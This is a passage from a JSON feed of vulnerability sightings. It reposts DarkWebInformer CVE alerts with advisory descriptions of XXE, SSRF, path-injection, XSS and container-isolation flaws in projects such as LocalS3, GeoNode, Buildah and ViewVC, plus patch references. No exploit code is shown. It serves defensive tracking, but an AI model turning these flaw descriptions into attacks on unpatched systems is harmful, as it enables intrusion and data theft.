maintainer was informed beforehand about the issues. She reacted very fast and highly professional.\n\ud83d\udccf Published: 2025-03-11T06:31:06.971Z\n\ud83d\udccf Modified: 2025-03-11T06:31:06.971Z\n\ud83d\udd17 References:\n1. https://vuldb.com/?id.299203\n2. https://vuldb.com/?ctiid.299203\n3. https://vuldb.com/?submit.512800\n4. https://github.com/zapping-vbi/zvbi/security/advisories/GHSA-g7cg-7gw9-v8cf\n5. https://github.com/zapping-vbi/zvbi/commit/ca1672134b3e2962cd392212c73f44f8f4cb489f\n6. https://github.com/zapping-vbi/zvbi/releases/tag/v0.2.44", "creation_timestamp": "2025-03-11T07:39:46.000000Z"}, {"uuid": "a8030a3a-da91-4a22-8a56-574c4d6c9a93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G6WM-2V64-WQ36", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7039", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27136\n\ud83d\udd25 CVSS Score: 5.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P)\n\ud83d\udd39 Description: LocalS3 is an Amazon S3 mock service for testing and local development. Prior to version 1.21, the LocalS3 service's bucket creation endpoint is vulnerable to XML External Entity (XXE) injection. When processing the CreateBucketConfiguration XML document during bucket creation, the service's XML parser is configured to resolve external entities. This allows an attacker to declare an external entity that references an internal URL, which the server will then attempt to fetch when parsing the XML. The vulnerability specifically occurs in the location constraint processing, where the XML parser resolves external entities without proper validation or restrictions. When the external entity is resolved, the server makes an HTTP request to the specified URL and includes the response content in the parsed XML document. This vulnerability can be exploited to perform server-side request forgery (SSRF) attacks, allowing an attacker to make requests to internal services or resources that should not be accessible from external networks. The server will include the responses from these internal requests in the resulting bucket configuration, effectively leaking sensitive information. The attacker only needs to be able to send HTTP requests to the LocalS3 service to exploit this vulnerability.\n\ud83d\udccf Published: 2025-03-10T18:24:38.743Z\n\ud83d\udccf Modified: 2025-03-10T19:09:21.238Z\n\ud83d\udd17 References:\n1. https://github.com/Robothy/local-s3/security/advisories/GHSA-g6wm-2v64-wq36\n2. https://github.com/Robothy/local-s3/commit/d6ed756ceb30c1eb9d4263321ac683d734f8836f", "creation_timestamp": "2025-03-10T19:38:32.000000Z"}, {"uuid": "da8f6b42-b5ff-4833-b2ac-fa0b61a4c655", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MCMC-C59M-PQQ8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7044", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26043\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: GeoNode is an open source platform that facilitates the creation, sharing, and collaborative use of geospatial data. GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read. This issue has been patched in version 4.0.3.\n\n\ud83d\udccf Published: 2023-02-27T20:37:28.684Z\n\ud83d\udccf Modified: 2025-03-10T18:53:48.331Z\n\ud83d\udd17 References:\n1. https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8\n2. https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0", "creation_timestamp": "2025-03-10T19:38:39.000000Z"}, {"uuid": "bea4ab1d-94d0-4223-87a7-2cd9817910c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9454", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7583", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9341\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in Go. When FIPS mode is enabled on a system, container runtimes may incorrectly handle certain file paths due to improper validation in the containers/common Go library. This flaw allows an attacker to exploit symbolic links and trick the system into mounting sensitive host directories inside a container. This issue also allows attackers to access critical host files, bypassing the intended isolation between containers and the host system.\n\ud83d\udccf Published: 2024-10-01T18:52:00.686Z\n\ud83d\udccf Modified: 2025-03-14T16:37:18.925Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10147\n2. https://access.redhat.com/errata/RHSA-2024:10818\n3. https://access.redhat.com/errata/RHSA-2024:7925\n4. https://access.redhat.com/errata/RHSA-2024:8039\n5. https://access.redhat.com/errata/RHSA-2024:8112\n6. https://access.redhat.com/errata/RHSA-2024:8238\n7. https://access.redhat.com/errata/RHSA-2024:8263\n8. https://access.redhat.com/errata/RHSA-2024:8428\n9. https://access.redhat.com/errata/RHSA-2024:8690\n10. https://access.redhat.com/errata/RHSA-2024:8694\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:9454\n13. https://access.redhat.com/errata/RHSA-2024:9459\n14. https://access.redhat.com/security/cve/CVE-2024-9341\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2315691\n16. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L169\n17. https://github.com/containers/common/blob/384f77532f67afc8a73d8e0c4adb0d195df57714/pkg/subscriptions/subscriptions.go#L349", "creation_timestamp": "2025-03-14T16:43:58.000000Z"}, {"uuid": "aad877ef-0181-45b4-9e61-8ef5ad889f26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5MWP-XW7P-5J27", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12751", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23512\n\ud83d\udd25 CVSS Score: 7.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N)\n\ud83d\udd39 Description: MeterSphere is a one-stop open source continuous testing platform. Versions prior to 2.4.1 are vulnerable to Path Injection in ApiTestCaseService::deleteBodyFiles which takes a user-controlled string id and passes it to ApiTestCaseService, which uses the user-provided value (testId) in new File(BODY_FILE_DIR + \"/\" + testId), being deleted later by file.delete(). By adding some camouflage parameters to the url, an attacker can target files on the server. The vulnerability has been fixed in v2.4.1.\n\ud83d\udccf Published: 2022-12-14T13:09:36.800Z\n\ud83d\udccf Modified: 2025-04-21T19:20:37.099Z\n\ud83d\udd17 References:\n1. https://github.com/metersphere/metersphere/security/advisories/GHSA-5mwp-xw7p-5j27", "creation_timestamp": "2025-04-21T20:03:23.000000Z"}, {"uuid": "76f6e413-3b59-48a9-862b-bd54937d631b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8994", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "33ef79e8-11b9-4469-83ef-112a0e2f5a0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9051", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "acd95736-076c-49b7-b43f-c062342f658e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0900", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14537", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12397\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A flaw was found in Quarkus-HTTP, which incorrectly parses cookies with\ncertain value-delimiting characters in incoming requests. This issue could\nallow an attacker to construct a cookie value to exfiltrate HttpOnly cookie\nvalues or spoof arbitrary additional cookie values, leading to unauthorized\ndata access or modification. The main threat from this flaw impacts data\nconfidentiality and integrity.\n\ud83d\udccf Published: 2024-12-12T09:05:28.451Z\n\ud83d\udccf Modified: 2025-05-02T16:29:42.017Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0900\n2. https://access.redhat.com/errata/RHSA-2025:1082\n3. https://access.redhat.com/errata/RHSA-2025:3018\n4. https://access.redhat.com/security/cve/CVE-2024-12397\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2331298", "creation_timestamp": "2025-05-02T17:16:41.000000Z"}, {"uuid": "c1dbae68-edfc-4ba8-b768-aaf3ea847128", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9454", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "f69c82ce-ab76-4f5d-909c-723c14bc4633", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9459", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "eccc3e8d-5fe4-4f5d-b595-c4f6b7c817ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8708", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "5067d15c-8985-4c62-bbd0-b5400c4fcd85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54W6-VXFH-FW7F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7063", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22465\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Http4s is a Scala interface for HTTP services. Starting with version 0.1.0 and prior to versions 0.21.34, 0.22.15, 0.23.17, and 1.0.0-M38, the `User-Agent` and `Server` header parsers are susceptible to a fatal error on certain inputs.  In http4s, modeled headers are lazily parsed, so this only applies to services that explicitly request these typed headers. Fixes are released in 0.21.34, 0.22.15, 0.23.17, and 1.0.0-M38. As a workaround, use the weakly typed header interface.\n\ud83d\udccf Published: 2023-01-04T15:30:04.129Z\n\ud83d\udccf Modified: 2025-03-10T21:32:44.734Z\n\ud83d\udd17 References:\n1. https://github.com/http4s/http4s/security/advisories/GHSA-54w6-vxfh-fw7f", "creation_timestamp": "2025-03-10T21:39:15.000000Z"}, {"uuid": "82c996d0-44ac-47b6-9533-19ac5b5a3333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73J8-XRCR-Q6J7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7055", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22452\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: kenny2automate is a Discord bot. In the web interface for server settings, form elements were generated with Discord channel IDs as part of input names. Prior to commit a947d7c, no validation was performed to ensure that the channel IDs submitted actually belonged to the server being configured. Thus anyone who has access to the channel ID they wish to change settings for and the server settings panel for any server could change settings for the requested channel no matter which server it belonged to. Commit a947d7c resolves the issue and has been deployed to the official instance of the bot. The only workaround that exists is to disable the web config entirely by changing it to run on localhost. Note that a workaround is only necessary for those who run their own instance of the bot.\n\ud83d\udccf Published: 2023-01-02T19:17:59.571Z\n\ud83d\udccf Modified: 2025-03-10T21:33:37.198Z\n\ud83d\udd17 References:\n1. https://github.com/Kenny2github/kenny2automate/security/advisories/GHSA-73j8-xrcr-q6j7\n2. https://github.com/Kenny2github/kenny2automate/commit/a947d7ce408687b587c7e6dfd6026f7c4ee31ac2", "creation_timestamp": "2025-03-10T21:39:04.000000Z"}, {"uuid": "368cb8ff-365c-41ec-a783-b971d52519d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8437-HGCM-P3Q3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7064", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46180\n\ud83d\udd25 CVSS Score: 5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)\n\ud83d\udd39 Description: Discourse Mermaid (discourse-mermaid-theme-component) allows users of Discourse, open-source forum software, to create graphs using the Mermaid syntax. Users of discourse-mermaid-theme-component version 1.0.0 who can create posts are able to inject arbitrary HTML on that post. The issue has been fixed on the `main` branch of the GitHub repository, with 1.1.0 named as a patched version. Admins can update the theme component through the admin UI. As a workaround, admins can temporarily disable discourse-mermaid-theme-component.\n\ud83d\udccf Published: 2023-01-04T16:44:54.487Z\n\ud83d\udccf Modified: 2025-03-10T21:32:39.201Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse-mermaid-theme-component/security/advisories/GHSA-8437-hgcm-p3q3\n2. https://github.com/discourse/discourse-mermaid-theme-component/pull/14\n3. https://github.com/discourse/discourse-mermaid-theme-component/commit/c10bc4a08bf865cee20e5d5dffba535762813f0f", "creation_timestamp": "2025-03-10T21:39:19.000000Z"}, {"uuid": "2735271f-f2fd-46d6-b8f5-04d2a3f93843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2233-CQJ8-J2Q5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7059", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23506\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Spinnaker is an open source, multi-cloud continuous delivery platform for releasing software changes, and Spinnaker's Rosco microservice produces machine images. Rosco prior to versions 1.29.2, 1.28.4, and 1.27.3 does not property mask secrets generated via packer builds.  This can lead to exposure of sensitive AWS credentials in packer log files. Versions 1.29.2, 1.28.4, and 1.27.3 of Rosco contain fixes for this issue.\n\nA workaround is available. It's recommended to use short lived credentials via role assumption and IAM profiles. Additionally, credentials can be set in `/home/spinnaker/.aws/credentials` and `/home/spinnaker/.aws/config` as a volume mount for Rosco pods vs. setting credentials in roscos bake config properties. Last even with those it's recommend to use IAM Roles vs. long lived credentials. This drastically mitigates the risk of credentials exposure. If users have used static credentials, it's recommended to purge any bake logs for AWS, evaluate whether AWS_ACCESS_KEY, SECRET_KEY and/or other sensitive data has been introduced in log files and bake job logs. Then, rotate these credentials and evaluate potential improper use of those credentials.\n\ud83d\udccf Published: 2023-01-03T20:04:25.392Z\n\ud83d\udccf Modified: 2025-03-10T21:33:14.857Z\n\ud83d\udd17 References:\n1. https://github.com/spinnaker/spinnaker/security/advisories/GHSA-2233-cqj8-j2q5\n2. https://github.com/spinnaker/rosco/commit/e80cfaa1abfb3a0e9026d45d6027291bfb815daf", "creation_timestamp": "2025-03-10T21:39:11.000000Z"}, {"uuid": "b4bfc1d9-cf6d-40f4-ac3b-fa126b6175f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J4MX-F97J-GC5G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7058", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22456\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: ViewVC, a browser interface for CVS and Subversion version control repositories, as a cross-site scripting vulnerability that affects versions prior to 1.2.2 and 1.1.29. The impact of this vulnerability is mitigated by the need for an attacker to have commit privileges to a Subversion repository exposed by an otherwise trusted ViewVC instance. The attack vector involves files with unsafe names (names that, when embedded into an HTML stream, would cause the browser to run unwanted code), which themselves can be challenging to create. Users should update to at least version 1.2.2 (if they are using a 1.2.x version of ViewVC) or 1.1.29 (if they are using a 1.1.x version).\n\nViewVC 1.0.x is no longer supported, so users of that release lineage should implement a workaround. Users can edit their ViewVC EZT view templates to manually HTML-escape changed paths during rendering. Locate in your template set's `revision.ezt` file references to those changed paths, and wrap them with `[format \"html\"]` and `[end]`. For most users, that means that references to `[changes.path]` will become `[format \"html\"][changes.path][end]`. (This workaround should be reverted after upgrading to a patched version of ViewVC, else changed path names will be doubly escaped.)\n\ud83d\udccf Published: 2023-01-03T18:29:51.262Z\n\ud83d\udccf Modified: 2025-03-10T21:33:20.040Z\n\ud83d\udd17 References:\n1. https://github.com/viewvc/viewvc/security/advisories/GHSA-j4mx-f97j-gc5g\n2. https://github.com/viewvc/viewvc/issues/311\n3. https://github.com/viewvc/viewvc/releases/tag/1.1.29\n4. https://github.com/viewvc/viewvc/releases/tag/1.2.2", "creation_timestamp": "2025-03-10T21:39:07.000000Z"}, {"uuid": "9f1e2b95-ef3d-4d3f-a935-16448d8f7941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JVPJ-293Q-Q53H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7062", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22464\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: ViewVC is a browser interface for CVS and Subversion version control repositories. Versions prior to 1.2.3 and 1.1.30 are vulnerable to cross-site scripting. The impact of this vulnerability is mitigated by the need for an attacker to have commit privileges to a Subversion repository exposed by an otherwise trusted ViewVC instance. The attack vector involves files with unsafe names (names that, when embedded into an HTML stream, would cause the browser to run unwanted code), which themselves can be challenging to create. Users should update to at least version 1.2.3 (if they are using a 1.2.x version of ViewVC) or 1.1.30 (if they are using a 1.1.x version).\n\nViewVC 1.0.x is no longer supported, so users of that release lineage should implement one of the following workarounds. Users can edit their ViewVC EZT view templates to manually HTML-escape changed path \"copyfrom paths\" during rendering. Locate in your template set's `revision.ezt` file references to those changed paths, and wrap them with `[format \"html\"]` and `[end]`.  For most users, that means that references to `[changes.copy_path]` will become `[format \"html\"][changes.copy_path][end]`. (This workaround should be reverted after upgrading to a patched version of ViewVC, else \"copyfrom path\" names will be doubly escaped.)\n\n\ud83d\udccf Published: 2023-01-04T15:12:50.980Z\n\ud83d\udccf Modified: 2025-03-10T21:32:51.391Z\n\ud83d\udd17 References:\n1. https://github.com/viewvc/viewvc/security/advisories/GHSA-jvpj-293q-q53h\n2. https://github.com/viewvc/viewvc/issues/311\n3. https://github.com/viewvc/viewvc/releases/tag/1.1.30\n4. https://github.com/viewvc/viewvc/releases/tag/1.2.3", "creation_timestamp": "2025-03-10T21:39:14.000000Z"}, {"uuid": "70484752-a1ea-4abe-8798-d6a7f28b13b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 